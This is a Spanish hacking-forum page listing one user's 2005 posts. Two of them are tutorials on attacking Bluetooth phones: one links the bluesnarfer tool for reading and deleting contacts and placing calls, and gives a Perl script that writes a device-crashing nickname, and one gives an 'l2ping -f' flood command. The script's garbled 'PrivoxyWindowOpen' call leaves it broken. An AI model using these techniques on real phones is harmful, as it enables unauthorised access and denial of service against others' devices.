elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el ttwitter! de elhacker.NET


  Mostrar Temas
Páginas: [1]
1  Comunicaciones / Hacking Mobile / Práctica 1 - Acceder a agendas, borrarlas, hacer llamadas sin permiso, etc... en: 12 Julio 2005, 12:15 pm
Bueno voy a hacer mi aportación personal al taller, como ya puse otras noticias y descargas ahora voy a seguir con otra práctica, rápida y simple.


PRIMERA PARTE

Lo que vamos a ver es cómo acceder a un teléfono movil con BT ( no todos los móviles son vulnerables). Como habréis leido en varias noticias, por ejemplo en la recopilación que hizo firos:

http://foro.elhacker.net/index.php/topic,77595.0.html

Se habla de bluesniffer, que con un portatil accediendo a un parlamento o senado no recuerdo bien, se hicieron con la agenda electrónica de muchos de los políticos, pues ahora os voy a mostrar cómo se hizo este ejercicio, bastante simple a pesar de parecer muy complicado.

Para ello necesitaremos un programa del mismo nombre blusnafer que podeis descargar aquí:

http://usuarios.lycos.es/wormzweb/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=277&title=Bluesnarfer%200.1

Este pequeña utilidad permite por medio de comandos acceder a ciertos teléfonos móviles vulnerables, y conseguir ver un listado de las últimas llamadas, ver la agenda electronica, borrarla, hacer llamadas , etc... todo esto lo podéis ver en el siguiente video explicativo bastatne corto y muy demostrativo de lo simple que resulta hacer todo esto:

http://usuarios.lycos.es/wormzweb/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=280&title=Video%20tutorial%20de%20blue%20snarfer

Podéis leer mas información sobre esto en el siguiente link:
http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=218


SEGUNDA PARTE

En esta segunda parte voy a mostrar algo bien simple, es una vulnerabilidad conocida como bluestab, (puñalada azul) la cual permite el reinicio de ciertos dispositivos vulnerables, para lo cual basta con cambiar el nick de tu dispositivo movil, esto es debido a usar una parte de código hexadecimal en el nick que provoca que ciertos teléfonos se bloquen y es reinicien automaticamente, esta vulnerabilidad es muy curiosa ya que simplemente con tener este nick, cuando alguien busque dispositivos BT y encuentre el tuyo, se reiniciará automaticamente sin saber el motivo. Para realizar esto basta con usar el siguiente programa que os creará un nick "xploit", que debereis copiar luego como nick.


Código:
nokia-bt-cx.pl

-------------start---------------

#!/usr/bin/perl -w



my $btnick;

my $bth;

my $bts;

my $file;

$bth = " .";

print "\n********************** ************************************************** **************************** ************\n

";

print "****************** Reinicio de dispositivos vulnerables por medio de nombre en dispositivo BT ********************\n";

print "** mas información sobre su uso en http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=217 **\n";

print "*****************                                [::wormz::] www.wormzweb.tk                      *****************\n";

print "************************* ****************************** ****************************** ******************************\n";



print " \n Escribe tu nick : ";

$btnick = <STDIN>;

chomp($btnick);

print " \n OUTPUT : ";

$file = <STDIN>;

chomp($file);

PrivoxyWindowOpen(BLUEN, ">>$file") || die "No se ha podido crear el archivo $!\n";

$bts = "$btnick$bth";

print BLUEN ("$bts");

close(BLUEN);



print "\n ¡Finalizado! , Envia el texto a tu teléfono y copialo en el nombre de tu telefono BT \n\n";

-------------end-----------------

Bueno como he dicho este programilla os creará un fichero que debeis enviar a vuestro movil y copiarlo en el nick.

Podéis leer mas información sobre esto en el siguiente link:
http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=218


TERCERA PARTE:

Bueno, siento no ser mas comleto en todo esto pero estoy aún bastante liado, espero que en unos dias tener mas tiempo y poder ser mas específico y explicar todo mas en profundidad para los que le gusta la teoría, también para los que les gusta juguetear con pequeñas aplicaciones les recomiendo que vean la noticia que puse en mi web sobre hack BT, en la que hay unas pequeñas aplicaciones para descargar muy simples, que por lo general son escaneadores con diferentes utilidades y bastante interesantes.

http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=218

Espero haber servido de ayuda en el taller y que sea una aportación mas al taller BT.

Un saludo xXx
2  Comunicaciones / Hacking Mobile / Bluetooth SIG DoS & Programa para escanear y nukear dispositivos BT en: 14 Junio 2005, 12:07 pm
En securityfocus se ha reportado un fallo de seguridad, consiste en un ataque DoS al hacer un ping a dispositivos BT desde linux, al parecer esto produce que el dispositivo deje de responder.

Se ha comprobado con:

- -Nokia 7650 (Symbian 6.0)
- -Nokia 6600 (Symbian 7.0)
- -Siemens V55
- -Motorola S55
- -Conceptronic (CBTU)


Y al parecer aún no está claro a que es debido, algunos comentan que es un fallo de diseño del BT, pero aún no se tieen claro.

Al parecer incluso en algunos casos si el dispositivo esta oculto puede ser atacado.

Para reproducir desde linux:
# l2ping -f <bluetooth_address>



Más información en securityfocus (en inglés)

http://www.securityfocus.com/archive/1/402156/30/0/threaded

Mas información en wormz (en castellano)
http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=205
3  Foros Generales / Sugerencias y dudas sobre el Foro / Dónde va mejor este post :S en: 15 Abril 2005, 01:04 am
JEjeje tengo una dudilla pero vamos que es solo por curiosidad, escribí un post sobre un exploit para móviles LG, y lo puse en la sección móviles, y ahora pienso......

¿dónde es mas correcto al ser un xploit para móviles en telefonia o en bugs y xploits? XDD es que en telefonía no se si deberia ir ese tipo de mensajes de xploits, y en bugs y xploits no se si pega un post de telefonía :S dónde os parece que quedaría mejor

http://foro.elhacker.net/index.php/topic,66318.0.html

Salu2
4  Foros Generales / Sugerencias y dudas sobre el Foro / proliferación de post hacking wireless en: 15 Marzo 2005, 05:56 am
Ultimamente en hacking básico y hacking avanzado esta abundando muchisimos post sobre hack redes wireless, y sobre wireless en general, y claro ultimamente están casi ocupando todo la sección de hacking basico y avanzado, (la primera página de hacking básico y avanzado, sobre todo avanzado estan casi llenas de post de ese tipo), y por ejemplo como yo estarán muchas otras personas, que yo por ejemplo no entiendo de hack wireless xq ni tngo router inalambrico ni nadie cercano a quien conectarme, entonces esos temas no puedo entrar xq no se nada para opinar.

Mi idea era a ver que os parecia ya que cada vez ese tema irá a mas, hacer una nueva sección en el foro sobre hack wireless , o un subforo en redes para wireless, el problema es que quizá al estar en redes ya la gente seguiría preguntando en hack avanzado. Pues na era solo para eso a ver que os parecía la propuesta que creo que como siga así en un tiempo gran mayoria de los post en hacking avanzado serán sobre hack redes wireless y temas similares

Un saludo ;)

http://foro.elhacker.net/index.php/board,48.0.html
5  Foros Generales / Sugerencias y dudas sobre el Foro / flash en post y firmas en: 13 Marzo 2005, 09:39 am
¿No se puede poner flash en post o firmas? me da problemas no soy capaz de ponerlos, sale el código
Esta deshabilitado el flash?

http://usuarios.lycos.es/wormzweb/pics/wormzflash.swf

En este caso sale link al flash en vez de salir el flash
6  Foros Generales / Sugerencias y dudas sobre el Foro / ¿Cómo llegar a ser colaborador o moderador? en: 22 Febrero 2005, 07:50 am
Me gustaría saber como se puede ser colaborador oficial o moderador de el foro :P
7  Foros Generales / Sugerencias y dudas sobre el Foro / Intercambio de Banners en: 20 Febrero 2005, 04:17 am
Propuse un post en el foro en la zona webmasters y no fue aceptado tan bien como esperaba, me remiten al foro libre, y no se, creo que estaría bien alguna zona para intercambio de banners entre los usuarios del foro, para promocionar nuestras webs, a ver que me decis ;)

Puse el post con mas información aquí

http://foro.elhacker.net/index.php/topic,58415.0.html

a ver que me decis que se podria hacer, o si se os ocurre alguna idea mejor ;)
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines